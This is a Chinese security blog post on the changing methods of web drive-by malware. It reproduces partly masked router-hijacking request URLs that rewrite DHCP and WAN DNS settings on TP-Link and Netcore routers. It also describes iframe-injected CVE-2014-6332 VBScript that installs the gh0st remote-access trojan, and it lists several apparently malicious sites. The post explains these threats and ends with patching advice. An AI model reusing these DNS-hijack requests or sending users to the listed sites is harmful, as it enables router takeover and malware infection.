“网马”变迁

网页挂马一直是个不停歇的战场,在之前捕获到一部分类型的“挂马”中,发现有相当一部分是通过在页面嵌入恶意代码,这样,防护较弱的机器访问的时候,就很容易中招,木马作者通过后续的操作可以达到不可告人的目的。

从已发现攻击例子来看,有不少是专门针对路由器的攻击,其中TPLINK系类的路由器和netcore系列路由器都遭受过不同类型的攻击,这方面主要是路由器自身固件的缺陷所致,以下列出一部分:

一、针对TPLINK系类路由器

 1. 修改DHCP服务的DNS,参数dnsserver和dnsserver2:

4

hxxp://XXX:XXX@192.168.1.1/XXX/XXXXXX.XXX?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=133.XXX.XXX.251&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6
 2. 修改WAN口的DNS,参数dnsserver和dnsserver2:

5

hxxp://xxx:xxx@192.168.1.1/XXX/XXX.XXX?wan=0&lcpMru=1492&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=&dnsserver=122.xxx.xxx.93&dnsserver2=8.8.8.8&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Submit=%B1%A3+%B4%E6&Advanced=Advanced&btn_Submit=%B1%A3+%B4%E6

二、针对netcore系列路由器

1.修改DHCP服务的DNS,参数dns1,dns2和dns3:
hxxp://xxx:xxx@192.168.1.1/xxx/xxx.xxx?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1=192.168.1.2&dhcp_end_ip1=192.168.1.254&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1=133.xxx.xxx.251&dns2=8.8.8.8&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88
2.修改WAN口DNS,参数dns1,dns2:
hxxp://xxx:xxx@192.168.1.1/XXX/XXX.XXX?user=<user>&pass=<pass>&mac=<mac_current>&mac_clone_btn=MAC%E5%9C%B0%E5%9D%80%E5%85%8B%E9%9A%86&mac_def_btn2=%E6%81%A2%E5%A4%8D%E7%BC%BA%E7%9C%81MAC&mtu=<mtu>&up_bandwidth=<up_bandwidth>&down_bandwidth=<down_bandwidth>&work_mode_radio=ROUTE&work_mode=<work_mode>&isp_radio=AUTO&isp=<isp>&line_detect=<line_detect>&time=1&timer_enable=<timer_enable>&monday=1&tuesday=2&wednesday=3&thursday=4&friday=5&saturday=6&sunday=7&timer_day=<timer_day>&start_hour=<start_hour>&start_minute=<start_minute>&end_hour=<end_hour>&end_minute=<end_minute>&pppoe_conf_radio=MANU&out_time=<out_time>&pppoe_conf=MANU&server_name=<server_name>&ac_name=<ac_name>&dns1=<dns1>&dns2=<dns2>&submitbutton=%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88&uiname=<uiname>&connect_type=<connect_type>

 

 

但是,随着厂商自身对产品的升级,导致针对路由器这类的攻击的效果开始下降,于是一些木马作者开始转向更好的利用手段。最近,微软近日披露了cve-2014-6332并发布了相关补丁,同时利用样本也已经被爆出网上,导致大规模被入侵的网站挂马。如果用户本地没有打上最新的补丁的话,在访问被挂马的网站,则容易被攻击,导致沦为木马作者手中的“肉鸡”。

被挂网站首页上通过iframe标签嵌入含有利用脚本的html.

1 2

挂马者改写流传出来的runmumaa函数,当这段vbs脚本触发的时候,浏览器会去下载后门远控木马植入到访问者的计算机上,已知IE3到IE11版本的浏览器都受影响。
从已经捕获到的攻击范围来看,目前全国各地区各个行业中,均有不同程度的被篡改的页面,或者本身就是有主观篡改挂马意图
以下列出极小部分:
http://www.99chg.com
http://210.41.188.114:8087/
http://103.228.130.51
http://www.987vv.com/
http://www.51pkav.com/1.html
http://113.10.169.69:8080
http://www.zseec.com/
http://www.wanrenkao.com/fuck.htm
大多数都是色情站

最终植入到访问者计算机上的是一个gh0st远控木马,上线协议标识甚至都没做任何改变。

3

 

受害者的机器则可以轻易被别人控制,文件上传,屏幕控制,或者实施c&c攻击。
对于这类“网马”,保持安全补丁及时更新,同时养成良好的上网习惯是非常有必要的,目前针对CVE-2014-6332这类的,360浏览器也会给出相应提示:

7

关于 ““网马”变迁” 的一个意见

评论关闭。